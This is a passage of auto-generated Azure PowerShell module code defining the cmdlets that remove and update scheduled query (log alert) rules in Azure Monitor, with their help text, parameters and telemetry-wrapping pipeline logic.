[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The description of the scheduled query rule.
${Description},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The display name of the alert rule
${DisplayName},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag which indicates whether this scheduled query rule is enabled.
# Value should be true or false
${Enabled},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# How often the scheduled query rule is evaluated represented in ISO 8601 duration format.
# Relevant and required only for rules of the kind LogAlert.
${EvaluationFrequency},
[Parameter()]
[ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.Kind])]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.Kind]
# Indicates the type of scheduled query rule.
# The default is LogAlert.
${Kind},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired.
# Relevant only for rules of the kind LogAlert.
${MuteActionsDuration},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods).
# Relevant only for rules of the kind LogAlert.
${OverrideQueryTimeRange},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# The list of resource id's that this scheduled query rule is scoped to.
${Scope},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Int64]
# Severity of the alert.
# Should be an integer between [0-4].
# Value of 0 is severest.
# Relevant and required only for rules of the kind LogAlert.
${Severity},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag which indicates whether the provided query should be validated or not.
# The default is false.
# Relevant only for rules of the kind LogAlert.
${SkipQueryValidation},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api10.ITrackedResourceTags]))]
[System.Collections.Hashtable]
# Resource tags.
${Tag},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# List of resource type of the target resource(s) on which the alert is created/updated.
# For example if the scope is a resource group and targetResourceTypes is Microsoft.Compute/virtualMachines, then a different alert will be fired for each virtual machine in the resource group which meet the alert criteria.
# Relevant only for rules of the kind LogAlert
${TargetResourceType},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# The period of time (in ISO 8601 duration format) on which the Alert query will be executed (bin size).
# Relevant and required only for rules of the kind LogAlert.
${WindowSize},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')]
[System.Management.Automation.PSObject]
# The DefaultProfile parameter is not functional.
# Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
begin {
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) {
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString()
}
$preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
if ($preTelemetryId -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString()
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet)
} else {
$internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
if ($internalCalledCmdlets -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name
} else {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal'
}
$mapping = @{
CreateExpanded = 'Az.ScheduledQueryRule.private\New-AzScheduledQueryRule_CreateExpanded';
}
if (('CreateExpanded') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) {
$testPlayback = $false
$PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } }
if ($testPlayback) {
$PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1')
} else {
$PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id
}
}
$cmdInfo = Get-Command -Name $mapping[$parameterSet]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name)
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
finally {
$backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
$backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
}
end {
try {
$steppablePipeline.End()
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets
if ($preTelemetryId -eq '') {
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
}
<#
.Synopsis
Deletes a scheduled query rule.
.Description
Deletes a scheduled query rule.
.Example
Remove-AzScheduledQueryRule -ResourceGroupName "test-group" -Name "test-rule"
.Inputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity
.Outputs
System.Boolean
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
INPUTOBJECT <IScheduledQueryRuleIdentity>: Identity Parameter
[Id <String>]: Resource identity path
[ResourceGroupName <String>]: The name of the resource group. The name is case insensitive.
[RuleName <String>]: The name of the rule.
[SubscriptionId <String>]: The ID of the target subscription.
.Link
https://learn.microsoft.com/powershell/module/az.monitor/remove-azscheduledqueryrule
#>
function Remove-AzScheduledQueryRule {
[OutputType([System.Boolean])]
[CmdletBinding(DefaultParameterSetName='Delete', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')]
param(
[Parameter(ParameterSetName='Delete', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the rule.
${Name},
[Parameter(ParameterSetName='Delete', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the resource group.
# The name is case insensitive.
${ResourceGroupName},
[Parameter(ParameterSetName='Delete')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String]
# The ID of the target subscription.
${SubscriptionId},
[Parameter(ParameterSetName='DeleteViaIdentity', Mandatory, ValueFromPipeline)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity]
# Identity Parameter
# To construct, see NOTES section for INPUTOBJECT properties and create a hash table.
${InputObject},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')]
[System.Management.Automation.PSObject]
# The DefaultProfile parameter is not functional.
# Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Returns true when the command succeeds
${PassThru},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
begin {
try {
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) {
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString()
}
$preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
if ($preTelemetryId -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString()
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet)
} else {
$internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
if ($internalCalledCmdlets -eq '') {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name
} else {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal'
}
$mapping = @{
Delete = 'Az.ScheduledQueryRule.private\Remove-AzScheduledQueryRule_Delete';
DeleteViaIdentity = 'Az.ScheduledQueryRule.private\Remove-AzScheduledQueryRule_DeleteViaIdentity';
}
if (('Delete') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) {
$testPlayback = $false
$PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } }
if ($testPlayback) {
$PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1')
} else {
$PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id
}
}
$cmdInfo = Get-Command -Name $mapping[$parameterSet]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name)
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
finally {
$backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId
$backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
}
end {
try {
$steppablePipeline.End()
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets
if ($preTelemetryId -eq '') {
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet)
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
}
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId
} catch {
[Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext()
throw
}
}
}
<#
.Synopsis
Update a scheduled query rule.
.Description
Update a scheduled query rule.
.Example
$subscriptionId=(Get-AzContext).Subscription.Id
Update-AzScheduledQueryRule -Name test-rule -ResourceGroupName test-group -Scope "/subscriptions/$subscriptionId/resourceGroups/test-group/providers/Microsoft.Compute/virtualMachines/test-vm" -ActionGroupResourceId "/subscriptions/$subscriptionId/resourceGroups/test-group/providers/microsoft.insights/actionGroups/test-action-group" -AutoMitigate:$false
.Inputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
CRITERIONALLOF <ICondition[]>: A list of conditions to evaluate against the specified scopes
[Dimension <IDimension[]>]: List of Dimensions conditions
Name <String>: Name of the dimension
Operator <DimensionOperator>: Operator for dimension values
Value <String[]>: List of dimension values
[FailingPeriodMinFailingPeriodsToAlert <Int64?>]: The number of violations to trigger an alert. Should be smaller or equal to numberOfEvaluationPeriods. Default value is 1
[FailingPeriodNumberOfEvaluationPeriod <Int64?>]: The number of aggregated lookback points. The lookback time window is calculated based on the aggregation granularity (windowSize) and the selected number of aggregated points. Default value is 1
[MetricMeasureColumn <String>]: The column containing the metric measure number. Relevant only for rules of the kind LogAlert.
[MetricName <String>]: The name of the metric to be sent. Relevant and required only for rules of the kind LogToMetric.
[Operator <ConditionOperator?>]: The criteria operator. Relevant and required only for rules of the kind LogAlert.
[Query <String>]: Log query alert
[ResourceIdColumn <String>]: The column containing the resource id. The content of the column must be a uri formatted as resource id. Relevant only for rules of the kind LogAlert.
[Threshold <Double?>]: the criteria threshold value that activates the alert. Relevant and required only for rules of the kind LogAlert.
[TimeAggregation <TimeAggregation?>]: Aggregation type. Relevant and required only for rules of the kind LogAlert.
INPUTOBJECT <IScheduledQueryRuleIdentity>: Identity Parameter
[Id <String>]: Resource identity path
[ResourceGroupName <String>]: The name of the resource group. The name is case insensitive.
[RuleName <String>]: The name of the rule.
[SubscriptionId <String>]: The ID of the target subscription.
.Link
https://learn.microsoft.com/powershell/module/az.monitor/update-azscheduledqueryrule
#>
function Update-AzScheduledQueryRule {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource])]
[CmdletBinding(DefaultParameterSetName='UpdateExpanded', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')]
param(
[Parameter(ParameterSetName='UpdateExpanded', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the rule.
${Name},
[Parameter(ParameterSetName='UpdateExpanded', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[System.String]
# The name of the resource group.
# The name is case insensitive.
${ResourceGroupName},
[Parameter(ParameterSetName='UpdateExpanded')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String]
# The ID of the target subscription.
${SubscriptionId},
[Parameter(ParameterSetName='UpdateViaIdentityExpanded', Mandatory, ValueFromPipeline)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity]
# Identity Parameter
# To construct, see NOTES section for INPUTOBJECT properties and create a hash table.
${InputObject},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IActionsCustomProperties]))]
[System.Collections.Hashtable]
# The properties of an alert payload.
${ActionCustomProperty},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# Action Group resource Ids to invoke when the alert fires.
${ActionGroupResourceId},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag that indicates whether the alert should be automatically resolved or not.
# The default is true.
# Relevant only for rules of the kind LogAlert.
${AutoMitigate},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag which indicates whether this scheduled query rule should be stored in the customer's storage.
# The default is false.
# Relevant only for rules of the kind LogAlert.
${CheckWorkspaceAlertsStorageConfigured},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.ICondition[]]
# A list of conditions to evaluate against the specified scopes
# To construct, see NOTES section for CRITERIONALLOF properties and create a hash table.
${CriterionAllOf},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The description of the scheduled query rule.
${Description},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String]
# The display name of the alert rule
${DisplayName},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag which indicates whether this scheduled query rule is enabled.
# Value should be true or false
${Enabled},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# How often the scheduled query rule is evaluated represented in ISO 8601 duration format.
# Relevant and required only for rules of the kind LogAlert.
${EvaluationFrequency},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired.
# Relevant only for rules of the kind LogAlert.
${MuteActionsDuration},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods).
# Relevant only for rules of the kind LogAlert.
${OverrideQueryTimeRange},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# The list of resource id's that this scheduled query rule is scoped to.
${Scope},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Int64]
# Severity of the alert.
# Should be an integer between [0-4].
# Value of 0 is severest.
# Relevant and required only for rules of the kind LogAlert.
${Severity},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.Management.Automation.SwitchParameter]
# The flag which indicates whether the provided query should be validated or not.
# The default is false.
# Relevant only for rules of the kind LogAlert.
${SkipQueryValidation},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResourcePatchTags]))]
[System.Collections.Hashtable]
# Resource tags
${Tag},
[Parameter()]
[AllowEmptyCollection()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.String[]]
# List of resource type of the target resource(s) on which the alert is created/updated.
# For example if the scope is a resource group and targetResourceTypes is Microsoft.Compute/virtualMachines, then a different alert will be fired for each virtual machine in the resource group which meet the alert criteria.
# Relevant only for rules of the kind LogAlert
${TargetResourceType},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')]
[System.TimeSpan]
# The period of time (in ISO 8601 duration format) on which the Alert query will be executed (bin size).
# Relevant and required only for rules of the kind LogAlert.
${WindowSize},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')]
[System.Management.Automation.PSObject]
# The DefaultProfile parameter is not functional.
# Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
